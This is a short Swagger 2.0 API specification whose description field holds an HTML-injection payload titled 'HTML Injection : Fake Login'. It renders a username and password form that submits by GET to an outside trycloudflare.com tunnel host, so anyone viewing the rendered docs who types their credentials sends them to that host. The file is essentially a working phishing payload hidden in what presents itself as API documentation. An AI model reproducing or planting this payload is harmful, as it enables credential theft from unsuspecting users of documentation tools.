swagger: '2.0'
info:
  version: 1.0.0
  title: Fake Login Page
  description: '<div class="login-form">
    <div class="heading">
        <h1>HTML Injection : Fake Login</h1>
    </div>
    <div class="form-container">
        <form action="https://quote-ordered-held-profiles.trycloudflare.com/" method="get">
        <label for="username">Username:</label>
        <input type="text" id="username" name="username" required>

        <label for="password">Password:</label>
        <input type="password" id="password" name="password" required>

        <button type="submit">Login</button>
    </form>
    </div>
</div>'
paths:
  /:
    get:
      responses:
        '200':
          description: Login successful
